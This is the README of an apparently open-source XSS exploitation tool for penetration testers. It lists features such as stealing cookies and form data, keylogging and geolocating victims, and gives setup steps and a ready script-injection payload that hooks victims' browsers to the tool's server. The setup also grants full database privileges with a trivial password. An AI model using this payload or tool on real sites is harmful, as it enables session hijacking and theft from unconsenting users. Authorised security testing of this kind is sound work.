XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.
- Technical Data about victim browser
- Geolocation of the victim
- Snapshot of the hooked/visited page
- Source code of the hooked/visited page
- Exfiltrate input field data
- Exfiltrate cookies
- Keylogging
- Display alert box
- Redirect user
Build the image:
$ docker-compose -f docker-compose.yml build
This will spin up the server and the database, visit the page http://localhost:8000 to see the XSS Exploitation Tool interface.
Tested on Debian 12
Install Git and pull the XSS-Exploitation-Tool source code:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
You may need Apache, Mysql database and PHP with modules:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html
Install composer, then install the application dependencies:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/
$ sudo mysql
Creating a new user with specific rights:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
Creating the database (will result in an empty page): visit the page http://localhost:8000/reset_database.php
Visit the page http://localhost:8000 to see the XSS Exploitation Tool interface.
Access the file exploit.html
: http://localhost:8000/demo/ or exploit a Cross-Site Scripting vulnerability to insert the Javascript hook file:
?vulnerable_param=<script src="http://localhost:8000/hook.js"/>
Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers.
This tool is intended for educational purposes only and should be used exclusively in authorized penetration testing environments. Unauthorized access to or use of systems that you do not own is illegal. The author is not responsible for any misuse of this tool.
This project is licensed under the GPL-3.0.